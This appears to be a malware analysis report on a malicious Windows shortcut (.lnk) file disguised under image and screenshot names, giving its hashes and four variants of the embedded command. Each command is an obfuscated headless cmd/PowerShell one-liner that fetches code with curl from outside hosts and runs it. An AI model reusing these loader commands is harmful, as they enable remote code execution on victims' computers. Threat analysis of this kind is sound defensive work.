| Hash | Hash Value |
|---|---|
| MD5 | c30ffd5bcf5562a81504e95bfbf0b264 |
| Sha1 | caff899aba3fca926315356db7932ff23716e700 |
| Sha256 | 8aadebc4fb43fb6cf3d81d5aa35eb479b9f38087d7f5fcd8f5767535dc548859 |
| Sha384 | 9743c72a0c07b4202052f9ad588610196170570069afdf8747ea940df356c856a489c2398f1e5919275c9e012339dbb3 |
| Sha512 | be7efc1581ec7cdac4a75b496fa555f3ba0d887a52a46a8d3d4ca6d06e63b82ef9b74097ad43b178173925749f6d232ca78dc7beab3e11958f2db96cd38a0467 |
| SSDeep | 49152:gmMQ1pE5ZNKuePgl9akfFK4hobv982FvfseypbKt:pzpE5KuePgl9VBob7Fns8 |
| TLSH | C1853359B30626EF0B6634A73D9479A9E1F05313F7F4F1D9A73289A58B398F046C0A31 |
| Name0 | Value |
|---|---|
| LNK: Command Execution | conhost.exe --headless ""c""md"" /c "set x=.(-join$env:ComSpec[4,24,25])(.(-join$env:ComSpec[4,24,25]) '.,@O.,@u.,@t.,@-.,@S.,@t.,@r.,@i.,@n.,@g.,@ .,@-.,@I.,@n.,@p.,@u.,@t.,@O.,@b.,@j.,@e.,@c.,@t.,@ .,@(.,@c.,@u.,@r.,@l.,@..,@e.,@x.,@e.,@ .,@-.,@k.,@ .,@-.,@H.,@ .,@ ".,@A.,@u.,@t.,@h.,@o.,@r.,@i.,@z.,@a.,@t.,@i.,@o.,@n.,@:.,@ .,@B.,@e.,@a.,@r.,@e.,@r.,@ .,@c.,@H.,@V.,@2.,@e.,@3.,@c.,@=.,@".,@ .,@h.,@t.,@t.,@p.,@s.,@:.,@/.,@/.,@a.,@p.,@p.,@-.,@1.,@7.,@7.,@6.,@0.,@4.,@0.,@4.,@8.,@9.,@-.,@o.,@w.,@e.,@y.,@m.,@a.,@..,@a.,@p.,@i.,@-.,@5.,@3.,@9.,@8.,@2.,@6.,@f.,@f.,@..,@w.,@o.,@r.,@k.,@e.,@r.,@s.,@..,@d.,@e.,@v.,@/.,@h.,@t.,@t.,@p.,@s.,@:.,@/.,@/.,@t.,@h.,@e.,@g.,@o.,@d.,@h.,@a.,@n.,@d.,@..,@c.,@c.,@/.,@a.,@p.,@i.,@/.,@s.,@e.,@c.,@o.,@n.,@d.,@e.,@y.,@e.,@).,@'.(-join([String]''.CompareTo)[9,10,7,30,8,4,10])('.,@','')) & echo %x% | %PSModulePath:~-23,10%" |
| LNK: Command Execution | conhost.exe --headless ""c""md"" /c "set x=.(-join$env:ComSpec[4,24,25])(.(-join$env:ComSpec[4,24,25]) '+$$O+$$u+$$t+$$-+$$S+$$t+$$r+$$i+$$n+$$g+$$ +$$-+$$I+$$n+$$p+$$u+$$t+$$O+$$b+$$j+$$e+$$c+$$t+$$ +$$(+$$c+$$u+$$r+$$l+$$.+$$e+$$x+$$e+$$ +$$-+$$k+$$ +$$-+$$H+$$ +$$ "+$$A+$$u+$$t+$$h+$$o+$$r+$$i+$$z+$$a+$$t+$$i+$$o+$$n+$$:+$$ +$$B+$$e+$$a+$$r+$$e+$$r+$$ +$$c+$$X+$$t+$$6+$$e+$$n+$$M+$$=+$$"+$$ +$$h+$$t+$$t+$$p+$$s+$$:+$$/+$$/+$$a+$$p+$$p+$$-+$$1+$$7+$$7+$$6+$$0+$$4+$$0+$$4+$$8+$$9+$$-+$$o+$$w+$$e+$$y+$$m+$$a+$$.+$$a+$$p+$$i+$$-+$$5+$$3+$$9+$$8+$$2+$$6+$$f+$$f+$$.+$$w+$$o+$$r+$$k+$$e+$$r+$$s+$$.+$$d+$$e+$$v+$$/+$$h+$$t+$$t+$$p+$$s+$$:+$$/+$$/+$$t+$$h+$$e+$$g+$$o+$$d+$$h+$$a+$$n+$$d+$$.+$$c+$$c+$$/+$$a+$$p+$$i+$$/+$$s+$$e+$$c+$$o+$$n+$$d+$$e+$$y+$$e+$$)+$$'.(-join([String]''.CompareTo)[9,10,7,30,8,4,10])('+$$','')) & echo %x% | %PSModulePath:~-23,10%" |
| LNK: Command Execution | conhost.exe --headless ""c""md"" /c "set x=.(-join$env:ComSpec[4,24,25])(.(-join$env:ComSpec[4,24,25]) ':?+O:?+u:?+t:?+-:?+S:?+t:?+r:?+i:?+n:?+g:?+ :?+-:?+I:?+n:?+p:?+u:?+t:?+O:?+b:?+j:?+e:?+c:?+t:?+ :?+(:?+c:?+u:?+r:?+l:?+.:?+e:?+x:?+e:?+ :?+-:?+k:?+ :?+-:?+H:?+ :?+ ":?+A:?+u:?+t:?+h:?+o:?+r:?+i:?+z:?+a:?+t:?+i:?+o:?+n:?+::?+ :?+B:?+e:?+a:?+r:?+e:?+r:?+ :?+e:?+3:?+F:?+x:?+e:?+n:?+M:?+=:?+":?+ :?+h:?+t:?+t:?+p:?+s:?+::?+/:?+/:?+a:?+p:?+p:?+-:?+1:?+7:?+7:?+6:?+0:?+4:?+0:?+4:?+8:?+9:?+-:?+o:?+w:?+e:?+y:?+m:?+a:?+.:?+a:?+p:?+i:?+-:?+5:?+3:?+9:?+8:?+2:?+6:?+f:?+f:?+.:?+w:?+o:?+r:?+k:?+e:?+r:?+s:?+.:?+d:?+e:?+v:?+/:?+h:?+t:?+t:?+p:?+s:?+::?+/:?+/:?+t:?+h:?+e:?+g:?+o:?+d:?+h:?+a:?+n:?+d:?+.:?+c:?+c:?+/:?+a:?+p:?+i:?+/:?+s:?+e:?+c:?+o:?+n:?+d:?+e:?+y:?+e:?+):?+'.(-join([String]''.CompareTo)[9,10,7,30,8,4,10])(':?+','')) & echo %x% | %PSModulePath:~-23,10%" |
| LNK: Command Execution | conhost.exe --headless ""c""md"" /c "set x=.(-join$env:ComSpec[4,24,25])(.(-join$env:ComSpec[4,24,25]) '?+@O?+@u?+@t?+@-?+@S?+@t?+@r?+@i?+@n?+@g?+@ ?+@-?+@I?+@n?+@p?+@u?+@t?+@O?+@b?+@j?+@e?+@c?+@t?+@ ?+@(?+@c?+@u?+@r?+@l?+@.?+@e?+@x?+@e?+@ ?+@-?+@k?+@ ?+@-?+@H?+@ ?+@ "?+@A?+@u?+@t?+@h?+@o?+@r?+@i?+@z?+@a?+@t?+@i?+@o?+@n?+@:?+@ ?+@B?+@e?+@a?+@r?+@e?+@r?+@ ?+@c?+@n?+@V?+@0?+@c?+@X?+@o?+@=?+@"?+@ ?+@h?+@t?+@t?+@p?+@s?+@:?+@/?+@/?+@a?+@p?+@p?+@-?+@1?+@7?+@7?+@6?+@0?+@4?+@0?+@4?+@8?+@9?+@-?+@o?+@w?+@e?+@y?+@m?+@a?+@.?+@a?+@p?+@i?+@-?+@5?+@3?+@9?+@8?+@2?+@6?+@f?+@f?+@.?+@w?+@o?+@r?+@k?+@e?+@r?+@s?+@.?+@d?+@e?+@v?+@/?+@h?+@t?+@t?+@p?+@s?+@:?+@/?+@/?+@t?+@h?+@e?+@g?+@o?+@d?+@h?+@a?+@n?+@d?+@.?+@c?+@c?+@/?+@a?+@p?+@i?+@/?+@s?+@e?+@c?+@o?+@n?+@d?+@e?+@y?+@e?+@)?+@'.(-join([String]''.CompareTo)[9,10,7,30,8,4,10])('?+@','')) & echo %x% | %PSModulePath:~-23,10%" |
| Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | conhost.exe --headless ""c""md"" /c "set x=.(-join$env:ComSpec[4,24,25])(.(-join$env:ComSpec[4,24,25]) '.,@O.,@u.,@t.,@-.,@S.,@t.,@r.,@i.,@n.,@g.,@ .,@-.,@I.,@n.,@p.,@u.,@t.,@O.,@b.,@j.,@e.,@c.,@t.,@ .,@(.,@c.,@u.,@r.,@l.,@..,@e.,@x.,@e.,@ .,@-.,@k.,@ .,@-.,@H.,@ .,@ ".,@A.,@u.,@t.,@h.,@o.,@r.,@i.,@z.,@a.,@t.,@i.,@o.,@n.,@:.,@ .,@B.,@e.,@a.,@r.,@e.,@r.,@ .,@c.,@H.,@V.,@2.,@e.,@3.,@c.,@=.,@".,@ .,@h.,@t.,@t.,@p.,@s.,@:.,@/.,@/.,@a.,@p.,@p.,@-.,@1.,@7.,@7.,@6.,@0.,@4.,@0.,@4.,@8.,@9.,@-.,@o.,@w.,@e.,@y.,@m.,@a.,@..,@a.,@p.,@i.,@-.,@5.,@3.,@9.,@8.,@2.,@6.,@f.,@f.,@..,@w.,@o.,@r.,@k.,@e.,@r.,@s.,@..,@d.,@e.,@v.,@/.,@h.,@t.,@t.,@p.,@s.,@:.,@/.,@/.,@t.,@h.,@e.,@g.,@o.,@d.,@h.,@a.,@n.,@d.,@..,@c.,@c.,@/.,@a.,@p.,@i.,@/.,@s.,@e.,@c.,@o.,@n.,@d.,@e.,@y.,@e.,@).,@'.(-join([String]''.CompareTo)[9,10,7,30,8,4,10])('.,@','')) & echo %x% | %PSModulePath:~-23,10%" Malicious |
c30ffd5bcf5562a81504e95bfbf0b264 > IMG20250723_1923342.lnk |
| LNK: Command Execution | conhost.exe --headless ""c""md"" /c "set x=.(-join$env:ComSpec[4,24,25])(.(-join$env:ComSpec[4,24,25]) '+$$O+$$u+$$t+$$-+$$S+$$t+$$r+$$i+$$n+$$g+$$ +$$-+$$I+$$n+$$p+$$u+$$t+$$O+$$b+$$j+$$e+$$c+$$t+$$ +$$(+$$c+$$u+$$r+$$l+$$.+$$e+$$x+$$e+$$ +$$-+$$k+$$ +$$-+$$H+$$ +$$ "+$$A+$$u+$$t+$$h+$$o+$$r+$$i+$$z+$$a+$$t+$$i+$$o+$$n+$$:+$$ +$$B+$$e+$$a+$$r+$$e+$$r+$$ +$$c+$$X+$$t+$$6+$$e+$$n+$$M+$$=+$$"+$$ +$$h+$$t+$$t+$$p+$$s+$$:+$$/+$$/+$$a+$$p+$$p+$$-+$$1+$$7+$$7+$$6+$$0+$$4+$$0+$$4+$$8+$$9+$$-+$$o+$$w+$$e+$$y+$$m+$$a+$$.+$$a+$$p+$$i+$$-+$$5+$$3+$$9+$$8+$$2+$$6+$$f+$$f+$$.+$$w+$$o+$$r+$$k+$$e+$$r+$$s+$$.+$$d+$$e+$$v+$$/+$$h+$$t+$$t+$$p+$$s+$$:+$$/+$$/+$$t+$$h+$$e+$$g+$$o+$$d+$$h+$$a+$$n+$$d+$$.+$$c+$$c+$$/+$$a+$$p+$$i+$$/+$$s+$$e+$$c+$$o+$$n+$$d+$$e+$$y+$$e+$$)+$$'.(-join([String]''.CompareTo)[9,10,7,30,8,4,10])('+$$','')) & echo %x% | %PSModulePath:~-23,10%" Malicious |
c30ffd5bcf5562a81504e95bfbf0b264 > SCREENSHOT_20260411_199283.lnk |
| LNK: Command Execution | conhost.exe --headless ""c""md"" /c "set x=.(-join$env:ComSpec[4,24,25])(.(-join$env:ComSpec[4,24,25]) ':?+O:?+u:?+t:?+-:?+S:?+t:?+r:?+i:?+n:?+g:?+ :?+-:?+I:?+n:?+p:?+u:?+t:?+O:?+b:?+j:?+e:?+c:?+t:?+ :?+(:?+c:?+u:?+r:?+l:?+.:?+e:?+x:?+e:?+ :?+-:?+k:?+ :?+-:?+H:?+ :?+ ":?+A:?+u:?+t:?+h:?+o:?+r:?+i:?+z:?+a:?+t:?+i:?+o:?+n:?+::?+ :?+B:?+e:?+a:?+r:?+e:?+r:?+ :?+e:?+3:?+F:?+x:?+e:?+n:?+M:?+=:?+":?+ :?+h:?+t:?+t:?+p:?+s:?+::?+/:?+/:?+a:?+p:?+p:?+-:?+1:?+7:?+7:?+6:?+0:?+4:?+0:?+4:?+8:?+9:?+-:?+o:?+w:?+e:?+y:?+m:?+a:?+.:?+a:?+p:?+i:?+-:?+5:?+3:?+9:?+8:?+2:?+6:?+f:?+f:?+.:?+w:?+o:?+r:?+k:?+e:?+r:?+s:?+.:?+d:?+e:?+v:?+/:?+h:?+t:?+t:?+p:?+s:?+::?+/:?+/:?+t:?+h:?+e:?+g:?+o:?+d:?+h:?+a:?+n:?+d:?+.:?+c:?+c:?+/:?+a:?+p:?+i:?+/:?+s:?+e:?+c:?+o:?+n:?+d:?+e:?+y:?+e:?+):?+'.(-join([String]''.CompareTo)[9,10,7,30,8,4,10])(':?+','')) & echo %x% | %PSModulePath:~-23,10%" Malicious |
c30ffd5bcf5562a81504e95bfbf0b264 > IMG20260329_1859432.lnk |
| LNK: Command Execution | conhost.exe --headless ""c""md"" /c "set x=.(-join$env:ComSpec[4,24,25])(.(-join$env:ComSpec[4,24,25]) '?+@O?+@u?+@t?+@-?+@S?+@t?+@r?+@i?+@n?+@g?+@ ?+@-?+@I?+@n?+@p?+@u?+@t?+@O?+@b?+@j?+@e?+@c?+@t?+@ ?+@(?+@c?+@u?+@r?+@l?+@.?+@e?+@x?+@e?+@ ?+@-?+@k?+@ ?+@-?+@H?+@ ?+@ "?+@A?+@u?+@t?+@h?+@o?+@r?+@i?+@z?+@a?+@t?+@i?+@o?+@n?+@:?+@ ?+@B?+@e?+@a?+@r?+@e?+@r?+@ ?+@c?+@n?+@V?+@0?+@c?+@X?+@o?+@=?+@"?+@ ?+@h?+@t?+@t?+@p?+@s?+@:?+@/?+@/?+@a?+@p?+@p?+@-?+@1?+@7?+@7?+@6?+@0?+@4?+@0?+@4?+@8?+@9?+@-?+@o?+@w?+@e?+@y?+@m?+@a?+@.?+@a?+@p?+@i?+@-?+@5?+@3?+@9?+@8?+@2?+@6?+@f?+@f?+@.?+@w?+@o?+@r?+@k?+@e?+@r?+@s?+@.?+@d?+@e?+@v?+@/?+@h?+@t?+@t?+@p?+@s?+@:?+@/?+@/?+@t?+@h?+@e?+@g?+@o?+@d?+@h?+@a?+@n?+@d?+@.?+@c?+@c?+@/?+@a?+@p?+@i?+@/?+@s?+@e?+@c?+@o?+@n?+@d?+@e?+@y?+@e?+@)?+@'.(-join([String]''.CompareTo)[9,10,7,30,8,4,10])('?+@','')) & echo %x% | %PSModulePath:~-23,10%" Malicious |
c30ffd5bcf5562a81504e95bfbf0b264 > IMG20260411_1823942.lnk |